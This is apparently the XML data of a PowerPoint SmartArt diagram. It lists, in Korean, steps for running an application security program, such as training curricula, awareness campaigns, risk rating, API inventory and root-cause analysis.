        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7732DA14-DAD9-46E0-81D8-10D0187DA04D}" type="sibTrans" cxnId="{460129C2-D5FA-4B36-A2D9-CA50D3D26274}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE257A8B-9F0D-43AA-B7BD-3FBFE906FFF4}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t> 다양한 개발 역할과 주제들을 대상으로 필요한 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>애플리케이션 보안 교육 커리큘럼</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:rPr>
            <a:t>을 구축합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{62F7C196-2CC6-4495-8CF5-4C83955CCDE7}" type="parTrans" cxnId="{1DB7B591-6809-448A-8C21-BBB2B50AA4BC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D00AB627-C459-4CA0-8533-6AE12C4AF5DB}" type="sibTrans" cxnId="{1DB7B591-6809-448A-8C21-BBB2B50AA4BC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0E290240-FB25-48CB-9DE8-8ECF38AAE9C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/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>애플리케이션 보안 프로그램</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>을 구축하고 채택하게 합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C74F7CCF-4A97-4642-9413-0A2E976A970D}" type="parTrans" cxnId="{8001C32B-B3D2-44E4-B168-D58088816164}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6265E4B5-2E98-46A5-ADC9-048081C9A39C}" type="sibTrans" cxnId="{8001C32B-B3D2-44E4-B168-D58088816164}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{358EDF8C-8C6C-4A98-AD7C-BA54D7458D8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/>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0"/>
            <a:t> IT</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>조직 전반적 차원에서 관리자의 승인을 얻고 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>애플리케이션 보안 인식 캠페인</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>을 확립해야 합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{93923CD5-3F77-4BB0-ABCA-1FC684535BD5}" type="parTrans" cxnId="{86F94DD0-2236-42C1-9D91-4B8FA24CEAD5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52D6C55F-602E-4052-B50B-CD9890407F6F}" type="sibTrans" cxnId="{86F94DD0-2236-42C1-9D91-4B8FA24CEAD5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4BCA67E-35D2-4123-A053-DEE8FFAB5595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en-US" sz="800" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t> 결과적으로 모든 애플리케이션 및 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="800" dirty="0"/>
            <a:t>API</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>를 측정하고 우선 순위를 지정하고 측정하십시오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="800" dirty="0"/>
            <a:t>. CMDB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>에 결과를 추가하십시오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="800" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE85C3FE-1F1D-4CEB-A3B4-C7540EE231E9}" type="sibTrans" cxnId="{50233F5E-90EB-4BBD-9CB9-2A9B9CA1D8C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CDA7BE68-6BA8-4F0D-A50C-9AFC60475895}" type="parTrans" cxnId="{50233F5E-90EB-4BBD-9CB9-2A9B9CA1D8C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27564A9E-075C-4939-8225-C2C8BB7C535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algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>  조직의 위험 허용 범위를 반영하는 일관된 가능성 및 영향 요인 집합을 사용하여 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>공통 위험 등급 모델</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>을 수립하십시오</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE84C732-5AE2-4FE5-8F2C-5153D9D1749F}" type="parTrans" cxnId="{567F56F9-2C19-43DB-8AA6-0E2DB6B91CBC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7B0C8DD3-C865-4E46-895E-BCF98E80DFB5}" type="sibTrans" cxnId="{567F56F9-2C19-43DB-8AA6-0E2DB6B91CBC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{512F6EEF-ACF1-4C76-BD45-43BBF4DDE5FA}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t> 성공하기 위해 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>개발 및 프로젝트 팀을</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>위한 서비스들</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>을 지원하고 주제별 전문가를 제공합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F595245-33EB-4032-B952-E577114EC0C8}" type="parTrans" cxnId="{B0D24F0C-55DA-4EE7-9BF8-7F45CF4D94AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{330024F4-984A-4BF9-B9DD-D4C62BF26ECA}" type="sibTrans" cxnId="{B0D24F0C-55DA-4EE7-9BF8-7F45CF4D94AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB1D9058-860B-438C-8C00-7CF2B819DFC6}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t> 기업 전체에 전략 및 체계적인 개선을 위해 근본 원인과 취약점 패턴을 찾기 위한 구현 및 검증 활동으로부터 데이터를 분석합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{16D0C892-C8FA-4C5B-AA63-3DEB553DFE65}" type="parTrans" cxnId="{82A99713-E919-40AB-96CA-F9CFA46B5A92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E81F880-6404-40D9-823C-EFC7690BD459}" type="sibTrans" cxnId="{82A99713-E919-40AB-96CA-F9CFA46B5A92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E8F4C90-7FEA-4CEC-9A03-4131742A1B05}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
            <a:t>실수로부터 학습하고 개선을 촉진하는 긍정적 인센티브를 제공합니다</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08FB0993-107F-4CBD-ADBD-C46189952032}" type="parTrans" cxnId="{38EC86D0-47A0-4CFB-867C-A8305A0F5C32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A59E2D66-3B71-4422-8BE4-2581A0D775C8}" type="sibTrans" cxnId="{38EC86D0-47A0-4CFB-867C-A8305A0F5C32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US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5" custScaleX="29073">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="5" custScaleY="109605" custLinFactNeighborX="-740" custLinFactNeighborY="1764">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/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5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/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5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" type="pres">
      <dgm:prSet presAssocID="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" type="pres">
      <dgm:prSet presAssocID="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5" custScaleX="30023">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5" custScaleY="103973">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst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0E8CAA06-95B5-4E47-97BC-A846075D0BBB}" type="presOf" srcId="{8D122DB6-6C0E-4D20-A72C-736DE21EC8D0}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B0D24F0C-55DA-4EE7-9BF8-7F45CF4D94AE}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{512F6EEF-ACF1-4C76-BD45-43BBF4DDE5FA}" srcOrd="1" destOrd="0" parTransId="{0F595245-33EB-4032-B952-E577114EC0C8}" sibTransId="{330024F4-984A-4BF9-B9DD-D4C62BF26ECA}"/>
    <dgm:cxn modelId="{82A99713-E919-40AB-96CA-F9CFA46B5A92}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{CB1D9058-860B-438C-8C00-7CF2B819DFC6}" srcOrd="1" destOrd="0" parTransId="{16D0C892-C8FA-4C5B-AA63-3DEB553DFE65}" sibTransId="{8E81F880-6404-40D9-823C-EFC7690BD459}"/>
    <dgm:cxn modelId="{4D73971C-72DD-4CCE-AAAD-2D1D3FD49EE6}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D15A361F-520E-4A6F-8FA7-A40C26F336F3}" type="presOf" srcId="{7E8F4C90-7FEA-4CEC-9A03-4131742A1B05}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8C1A2C21-80CE-41F4-BE88-FDB99EB1BA62}" type="presOf" srcId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8001C32B-B3D2-44E4-B168-D58088816164}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{0E290240-FB25-48CB-9DE8-8ECF38AAE9C1}" srcOrd="1" destOrd="0" parTransId="{C74F7CCF-4A97-4642-9413-0A2E976A970D}" sibTransId="{6265E4B5-2E98-46A5-ADC9-048081C9A39C}"/>
    <dgm:cxn modelId="{F244C835-9074-4B6A-B2CB-D5A4BC389787}" type="presOf" srcId="{358EDF8C-8C6C-4A98-AD7C-BA54D7458D84}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2F292A3E-F8D9-49C6-9560-B0FB7D206437}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{50233F5E-90EB-4BBD-9CB9-2A9B9CA1D8C7}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{C4BCA67E-35D2-4123-A053-DEE8FFAB5595}" srcOrd="2" destOrd="0" parTransId="{CDA7BE68-6BA8-4F0D-A50C-9AFC60475895}" sibTransId="{EE85C3FE-1F1D-4CEB-A3B4-C7540EE231E9}"/>
    <dgm:cxn modelId="{F8AD6560-6A01-47FF-AA0D-175CE9C1868D}" type="presOf" srcId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{60586B45-29DE-4B51-84B5-A67AE6D53B24}" type="presOf" srcId="{512F6EEF-ACF1-4C76-BD45-43BBF4DDE5FA}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DA05DF51-69DF-4CB3-ACC3-177A734B8162}" type="presOf" srcId="{27564A9E-075C-4939-8225-C2C8BB7C535B}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CF2D7854-3994-4C63-96CB-0B5FF1747F51}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4CF7517D-3B24-4F16-8B83-AE2073A3EB90}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{61569B86-BBC2-4716-A60E-00AEE2CA73EA}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{42804E8C-5CCE-4C30-9CE8-9BA9B7FB6C8C}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" srcOrd="3" destOrd="0" parTransId="{7BC25BDC-3278-4082-B675-15E8A5144241}" sibTransId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}"/>
    <dgm:cxn modelId="{1DB7B591-6809-448A-8C21-BBB2B50AA4BC}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{EE257A8B-9F0D-43AA-B7BD-3FBFE906FFF4}" srcOrd="2" destOrd="0" parTransId="{62F7C196-2CC6-4495-8CF5-4C83955CCDE7}" sibTransId="{D00AB627-C459-4CA0-8533-6AE12C4AF5DB}"/>
    <dgm:cxn modelId="{9CB74495-237D-4F40-98F9-915162C6F1AD}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" srcOrd="1" destOrd="0" parTransId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" sibTransId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615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8703B799-5EDD-48E5-94BD-117D04CAA789}" type="presOf" srcId="{EE257A8B-9F0D-43AA-B7BD-3FBFE906FFF4}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2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26ABB8A4-2126-4601-8276-CB099BFB0770}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" srcOrd="2" destOrd="0" parTransId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" sibTransId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}"/>
    <dgm:cxn modelId="{A4E2ECA4-F7FA-42B4-9F6F-C4BCA6DFD191}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8F59C4BA-52AB-41DC-8164-CBFBB209FD9A}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
